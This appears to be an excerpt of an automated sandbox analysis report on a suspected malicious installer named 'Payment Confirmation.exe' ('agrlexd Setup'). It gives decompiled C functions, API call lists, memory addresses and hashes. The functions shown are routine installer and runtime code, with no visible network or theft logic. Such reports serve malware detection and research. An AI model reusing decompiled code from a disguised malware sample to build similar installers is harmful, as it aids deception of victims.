                                                  • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000D08A, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E1000D08A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x1001dc00, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x1001dbfc - _t7;
								if(__eflags == 0) {
									_t9 = E1000985A(__eflags);
									 *_t9 = E100098A1(GetLastError());
									goto L17;
								} else {
									__eflags = E10009827(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E1000985A(__eflags);
										 *_t12 = E100098A1(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009827(_t6, _t31);
						 *((intOrPtr*)(E1000985A(__eflags))) = 0xc;
						goto L12;
					} else {
						E1000A34A(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E1000593F(__ebx, __edx, __edi, _a8);
				}
			}









                                                  0x1000d091
                                                  0x1000d09f
                                                  0x1000d0a2
                                                  0x1000d0a4
                                                  0x1000d0b3
                                                  0x1000d0e6
                                                  0x1000d0e6
                                                  0x1000d0e9
                                                  0x00000000
                                                  0x00000000
                                                  0x1000d0b6
                                                  0x1000d0b8
                                                  0x1000d0ba
                                                  0x1000d0ba
                                                  0x1000d0ba
                                                  0x1000d0c7
                                                  0x1000d0cd
                                                  0x1000d0cf
                                                  0x1000d0d1
                                                  0x1000d131
                                                  0x1000d131
                                                  0x1000d0d3
                                                  0x1000d0d3
                                                  0x1000d0d9
                                                  0x1000d11b
                                                  0x1000d12f
                                                  0x00000000
                                                  0x1000d0db
                                                  0x1000d0e2
                                                  0x1000d0e4
                                                  0x1000d103
                                                  0x1000d117
                                                  0x1000d0fd
                                                  0x1000d0fd
                                                  0x1000d0fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x1000d0e4
                                                  0x1000d0d9
                                                  0x00000000
                                                  0x1000d0ff
                                                  0x1000d0ec
                                                  0x1000d0f7
                                                  0x00000000
                                                  0x1000d0a6
                                                  0x1000d0a9
                                                  0x1000d0af
                                                  0x1000d0af
                                                  0x1000d100
                                                  0x1000d102
                                                  0x1000d093
                                                  0x1000d09d
                                                  0x1000d09d

                                                  APIs
                                                  • _malloc.LIBCMT ref: 1000D096
                                                    • Part of subcall function 1000593F: __FF_MSGBANNER.LIBCMT ref: 10005956
                                                    • Part of subcall function 1000593F: __NMSG_WRITE.LIBCMT ref: 1000595D
                                                    • Part of subcall function 1000593F: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005982
                                                  • _free.LIBCMT ref: 1000D0A9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AllocateHeap_free_malloc
                                                  • String ID:
                                                  • API String ID: 1020059152-0
                                                  • Opcode ID: 9d39850da3751aebf3c6929db2deb7e5c3669c7795a5b1f372dc604311e889e9
                                                  • Instruction ID: c1a69854746c6a6daa3b5a0fc7c070c4ce3977ed1f466f5233aafae258cb913c
                                                  • Opcode Fuzzy Hash: 9d39850da3751aebf3c6929db2deb7e5c3669c7795a5b1f372dc604311e889e9
                                                  • Instruction Fuzzy Hash: 1911A736904222AAF720FF709C8574D37D4EF062F1F218527F91C96259DF31D98187A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423ff0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						__eflags =  *0x423ff0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}










                                                  0x00402a79
                                                  0x00402a8a
                                                  0x00402a92
                                                  0x00402aba
                                                  0x00402aa1
                                                  0x00402aa4
                                                  0x00402af4
                                                  0x00402afa
                                                  0x00402afc
                                                  0x00000000
                                                  0x00402afc
                                                  0x00402ab1
                                                  0x00402ab6
                                                  0x00402ab8
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ab8
                                                  0x00402acf
                                                  0x00402ad7
                                                  0x00402ade
                                                  0x00402b04
                                                  0x00402b0a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b12
                                                  0x00402b18
                                                  0x00402b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b1a
                                                  0x00000000
                                                  0x00402aed
                                                  0x00402b01

                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                  • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                  • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                  • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                  0x00401ce8
                                                  0x00401cef
                                                  0x00401d1e
                                                  0x00401d26
                                                  0x00401d2d
                                                  0x00401d2d
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00401CE2
                                                  • GetClientRect.USER32 ref: 00401CEF
                                                  • LoadImageA.USER32 ref: 00401D10
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                  • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                  • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                  • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                                                  0x0040464f
                                                  0x00404654
                                                  0x0040465c
                                                  0x0040465d
                                                  0x0040466a
                                                  0x00404672
                                                  0x00404673
                                                  0x00404675
                                                  0x00404677
                                                  0x00404679
                                                  0x0040467c
                                                  0x0040467c
                                                  0x00404683
                                                  0x00404689
                                                  0x00404689
                                                  0x00404690
                                                  0x00404697
                                                  0x0040469a
                                                  0x0040469d
                                                  0x0040469d
                                                  0x004046a1
                                                  0x004046b1
                                                  0x004046b3
                                                  0x004046b6
                                                  0x0040465f
                                                  0x0040465f
                                                  0x00404666
                                                  0x00404666
                                                  0x004046be
                                                  0x004046c9
                                                  0x004046df
                                                  0x004046ef
                                                  0x0040470b

                                                  APIs
                                                  • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                  • wsprintfA.USER32 ref: 004046EF
                                                  • SetDlgItemTextA.USER32 ref: 00404702
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                  • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                  • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                  • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10004170, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E10004170(void* __ebx, void* __edi, char* _a4) {
				signed int _v8;
				signed int _v12;
				char _v13;
				void* _v14;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				signed char _t50;
				char* _t54;
				char* _t71;
				char* _t76;
				signed int _t82;
				char** _t90;

				_v8 = 0;
				_v12 = 0;
				_t71 = _a4;
				_t92 =  *(_t71 + 0x18) & 0x0000000f;
				_t82 = 1;
				_v13 = 1;
				if(( *(_t71 + 0x18) & 0x0000000f) != 0) {
					 *_t90 = L"(dec->bit_pos & 0xF) == 0";
					_v28 = L"Source.c";
					_v24 = 0xaa;
					E100052B7(__ebx, 1, __edi, _t92);
					_v13 = 0;
				}
				while(_a4[0x18] != 0) {
					_a4[0x18] = _a4[0x18] - 0x10;
					_v8 = (_a4[0x14] >> _a4[0x18] & 0x0000ffff) << _v12 | _v8;
					_v12 = _v12 + 0x10;
				}
				while(1) {
					__eflags = _v12 - 0x20;
					_v14 = 0;
					if(_v12 < 0x20) {
						_t54 = _a4;
						_t76 = _a4;
						__eflags =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8));
						_t32 =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8)) < 0;
						__eflags = _t32;
						_v14 = _t82 & 0xffffff00 | _t32;
					}
					_t50 = _v14;
					__eflags = _t50 & 0x00000001;
					if((_t50 & 0x00000001) == 0) {
						break;
					}
					 *_t90 = _a4;
					_v20 = E10004050() & 0x0000ffff;
					_v8 = _v20 << _v12 | _v8;
					_t82 = _v12 + 0x10;
					_v12 = _t82;
				}
				return _v8;
			}
















                                                  0x10004179
                                                  0x10004180
                                                  0x10004187
                                                  0x10004190
                                                  0x10004193
                                                  0x10004195
                                                  0x10004198
                                                  0x100041a4
                                                  0x100041ad
                                                  0x100041b1
                                                  0x100041b9
                                                  0x100041c0
                                                  0x100041c0
                                                  0x100041c6
                                                  0x100041dc
                                                  0x100041fa
                                                  0x10004203
                                                  0x10004203
                                                  0x10004210
                                                  0x10004212
                                                  0x10004216
                                                  0x10004219
                                                  0x1000421f
                                                  0x10004228
                                                  0x1000422b
                                                  0x1000422e
                                                  0x1000422e
                                                  0x10004231
                                                  0x10004231
                                                  0x10004234
                                                  0x10004237
                                                  0x10004239
                                                  0x00000000
                                                  0x00000000
                                                  0x10004247
                                                  0x10004255
                                                  0x10004262
                                                  0x10004268
                                                  0x1000426b
                                                  0x1000426b
                                                  0x1000427a

                                                  APIs
                                                  • __wassert.LIBCMT ref: 100041B9
                                                    • Part of subcall function 100052B7: GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000537C
                                                    • Part of subcall function 100052B7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 100053A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Module$FileHandleName__wassert
                                                  • String ID: $(dec->bit_pos & 0xF) == 0$Source.c
                                                  • API String ID: 1832359313-2493867184
                                                  • Opcode ID: ccd1caaa37adbdd5a951c3f3aa1b112fb8ed44e685e4eba09fe3c625b7c365a1
                                                  • Instruction ID: f2768f5fe2d9e4dfce25a831b0b3cafbfe9c1c5706e6b6f1d0c646be0fcd2790
                                                  • Opcode Fuzzy Hash: ccd1caaa37adbdd5a951c3f3aa1b112fb8ed44e685e4eba09fe3c625b7c365a1
                                                  • Instruction Fuzzy Hash: B6316B74A04248EFDB04DF98C0C0A9DBBF1EF54380F25849DE8899B346C731EA81DB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                  0x00401bd3
                                                  0x00401bdf
                                                  0x00401be2
                                                  0x00401beb
                                                  0x00401beb
                                                  0x00401bee
                                                  0x00401bf2
                                                  0x00401bfb
                                                  0x00401bfb
                                                  0x00401bfe
                                                  0x00401c02
                                                  0x00401c04
                                                  0x00401c51
                                                  0x00401c53
                                                  0x00401c5c
                                                  0x00401c64
                                                  0x00401c67
                                                  0x00401c67
                                                  0x00401c70
                                                  0x00000000
                                                  0x00401c06
                                                  0x00401c0d
                                                  0x00401c0f
                                                  0x00401c17
                                                  0x00401c1a
                                                  0x00401c42
                                                  0x00401c76
                                                  0x00401c76
                                                  0x00401c1c
                                                  0x00401c2a
                                                  0x00401c32
                                                  0x00401c35
                                                  0x00401c35
                                                  0x00401c1a
                                                  0x00401c79
                                                  0x00401c7c
                                                  0x00401c82
                                                  0x00402866
                                                  0x00402866
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                  • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                  • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                  • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004038B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f50; // 0x825438
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "agrlexd Setup", 0xfffffffe));
						_t11 =  *0x423f6c; // 0x3
						_t27 =  *0x423f68; // 0x8255e4
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x8255fc
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                  0x004038b8
                                                  0x004038bd
                                                  0x004038c3
                                                  0x004038c8
                                                  0x004038c8
                                                  0x004038d0
                                                  0x00000000
                                                  0x00000000
                                                  0x004038d2
                                                  0x004038d8
                                                  0x004038e0
                                                  0x004038e2
                                                  0x004038e8
                                                  0x004038e8
                                                  0x004038ea
                                                  0x004038f6
                                                  0x00000000
                                                  0x00000000
                                                  0x004038fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004038fc
                                                  0x00403901
                                                  0x0040390a
                                                  0x00403910
                                                  0x00403915
                                                  0x00403929
                                                  0x00403934
                                                  0x0040394c
                                                  0x00403952
                                                  0x00403957
                                                  0x0040395f
                                                  0x00403980
                                                  0x00403980
                                                  0x00403980
                                                  0x00403961
                                                  0x00403963
                                                  0x00403963
                                                  0x00403967
                                                  0x0040396a
                                                  0x0040396e
                                                  0x0040396e
                                                  0x00403973
                                                  0x00403979
                                                  0x00403979
                                                  0x00000000
                                                  0x00403963
                                                  0x00403917
                                                  0x0040391c
                                                  0x00403925
                                                  0x0040391e
                                                  0x0040391e
                                                  0x0040391e
                                                  0x0040391c

                                                  APIs
                                                  • SetWindowTextA.USER32(00000000,agrlexd Setup), ref: 0040394C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID: "C:\Users\user\Desktop\Payment Confirmation.exe" $1033$agrlexd Setup
                                                  • API String ID: 530164218-1879186842
                                                  • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                  • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                  • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                  • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10008691, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 16%
                                                  			E10008691(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                                                  0x10008695
                                                  0x100086a0
                                                  0x100086a8
                                                  0x100086b2
                                                  0x100086ba
                                                  0x00000000
                                                  0x100086bf
                                                  0x100086ba
                                                  0x100086c4

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,10003D2C,?,?,10008686,?,?,10009FAC,000000FF,0000001E,10019028,00000008,10009F4F,?,?), ref: 100086A0
                                                  • GetProcAddress.KERNEL32(10003D2C,CorExitProcess), ref: 100086B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
